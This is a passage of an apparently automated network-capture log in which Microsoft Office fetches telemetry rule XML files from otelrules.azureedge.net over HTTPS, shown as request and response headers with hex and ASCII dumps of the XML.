                                                                                                                                                                                                            ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                            x-ms-request-id: 23c3770b-601e-0084-293a-3c6b3f000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032746Z-178bfbc474b9xljthC1NYCtw9400000002d0000000001c42
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:46 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            124192.168.2.44995513.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:46 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:46 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:46 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                            x-ms-request-id: e8f84e55-c01e-0079-2269-3be51a000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032746Z-178bfbc474bxkclvhC1NYC69g400000002a000000000d041
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:46 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            125192.168.2.44995613.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:46 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:47 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:46 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                                            x-ms-request-id: 2537c9bf-601e-0050-536a-3c2c9c000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032746Z-174c587ffdfldtt2hC1TEBwv9c00000000qg00000000a5ec
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:47 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            126192.168.2.44995713.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:46 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:47 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                                            x-ms-request-id: 20e9f7cf-701e-005c-216c-3bbb94000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032747Z-174c587ffdf7t49mhC1TEB4qbg00000000sg00000000c39k
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:47 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            127192.168.2.44995813.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:48 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:48 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:48 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                            x-ms-request-id: cb4d723f-a01e-003d-7157-3c98d7000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032748Z-15b8b599d885v8r9hC1TEB104g00000000y0000000007r2u
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:48 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            128192.168.2.44995913.107.246.634438C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:48 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:48 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                            x-ms-request-id: 18ec886b-801e-0078-7044-3cbac6000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032748Z-178bfbc474btvfdfhC1NYCa2en00000002f000000000c6fr
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:48 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            129192.168.2.44996013.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:48 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:48 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:48 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                                            x-ms-request-id: 1aa9c07b-201e-0096-3276-3bace6000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032748Z-174c587ffdfcj798hC1TEB9bq4000000011g0000000096w9
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:48 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            130192.168.2.44996113.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:48 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:49 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:49 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                                            x-ms-request-id: ebbdbf89-001e-00a2-5a6a-3cd4d5000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032749Z-174c587ffdf8lw6dhC1TEBkgs800000000w0000000009ty8
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:49 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            131192.168.2.44996213.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:49 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:49 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                                            x-ms-request-id: 1a99a412-f01e-0099-613c-3c9171000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032749Z-15b8b599d88l2dpthC1TEBmzr000000000vg000000006mam
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:49 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            132192.168.2.44996313.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:50 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:50 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                                            x-ms-request-id: d029e12f-101e-00a2-1e39-3c9f2e000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032750Z-178bfbc474brk967hC1NYCfu60000000024g00000000gku1
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
